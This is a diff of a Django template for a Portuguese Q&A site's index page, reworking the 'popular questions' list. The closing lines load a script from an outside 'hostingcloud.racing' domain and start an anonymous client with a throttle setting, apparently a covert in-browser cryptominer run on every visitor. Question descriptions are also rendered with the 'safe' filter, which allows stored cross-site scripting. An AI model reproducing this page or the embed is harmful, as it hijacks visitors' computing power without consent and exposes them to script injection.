--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -74,7 +74,7 @@
 			{{ question.description|cut_description|safe|linebreaksbr }}
 									{% endif %}
 								</p>
-								<small>{{ question.id|total_answers }} respostas <b>&middot;</b> <span class="text-muted">{{ question.get_naturaltime }}</span></small>
+								<small>{{ question.id|total_answers }} respostas <b>&nbsp;&middot;&nbsp;</b> <span class="text-muted">{{ question.get_naturaltime }}</span></small>
 							{% if user.is_authenticated %}
 								{% if user_p.active %}
 									{% if user.username|answered:question.id %}
@@ -109,34 +109,35 @@
     <a class="btn btn-primary infinite-more-link" href="/news?page={{ questions.next_page_number }}">Próxima página</a>
   {% endif %}
 			</section>
-			<section class="card" id="p_questions">
-				<ul class="list-group list-group-flush infinite-container">
-				{% for question in popular_questions %}
-				<li class="list-group-item">
-					<div class="card-body">
-						<a href="/question/{{ question.id }}">
-							<b>{{ question.text }}</b>
-						</a>
-						<p>
-							{% if question.description != '' %}
-	{{ question.description|cut_description|safe|linebreaksbr }}
-							{% endif %}
-						</p>
-						<small>{{ question.id|total_answers }} respostas <b>&middot;</b> <span>{{ question.total_likes }} likes</span> <b>&middot;</b> {{ question.id|last_response|safe }}</small>
-					{% if user.is_authenticated %}
-						{% if user.username|answered:question.id %}
-						<span style="display: block"><b>Sua resposta:</b></span> {{ user.username|answer:question.id|linebreaksbr }}
-						{% else %}
-						<a style="display: block" href="/question/{{ question.id }}"><button class="btn btn-outline-primary">Responder</button></a>
-						{% endif %}
+
+<!-- Questões populares -->
+<section class="card" id="p_questions">
+	<ul class="list-group list-group-flush infinite-container">
+		{% for question in popular_questions %}
+		<li class="list-group-item">
+			<div class="card-body">
+				<a href="/question/{{ question.id }}"><b>{{ question.text }}</b></a>
+				<p>
+					{% if question.description != '' %}{{ question.description|cut_description|safe|linebreaksbr }}{% endif %}
+				</p>
+				<small>{{ question.id|total_answers }} respostas <b>&middot; </b> <span class="text-muted"><img src="/static/images/red-heart.png" width="15px"> {{ question.total_likes }}</span></small>
+				{% if user.is_authenticated %}
+					{% if user.username|answered:question.id %}
+				<span style="display: block"><b>Sua resposta:</b></span> {{ user.username|answer:question.id|linebreaksbr }}
 					{% else %}
-					<p><a href="/signin?redirect=/question/{{ question.id }}">Faça login</a> ou <a href="/signup?redirect=/question/{{ question.id }}">crie uma conta</a> para responder está pergunta.</p>
+				<a style="display: block" href="/question/{{ question.id }}"><button class="btn btn-outline-primary">Responder</button></a>
 					{% endif %}
-					</div>
-				</li>
-				{% endfor %}
-				<h5>Fim! <a href="/news">Clique aqui</a> para ver as novas perguntas.</h5>
-			</section>
+				{% else %}
+				<p><a href="/signin?redirect=/question/{{ question.id }}">Faça login</a> ou <a href="/signup?redirect=/question/{{ question.id }}">crie uma conta</a> para responder está pergunta.</p>
+			{% endif %}
+			</div>
+		</li>
+		{% endfor %}
+	</ul>
+	<h5>Fim! <a href="/news">Clique aqui</a> para ver as novas perguntas.</h5>
+</section>
+<!-- !Questões populares -->
+
 		<script src="/static/js/index.js?v=7"></script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
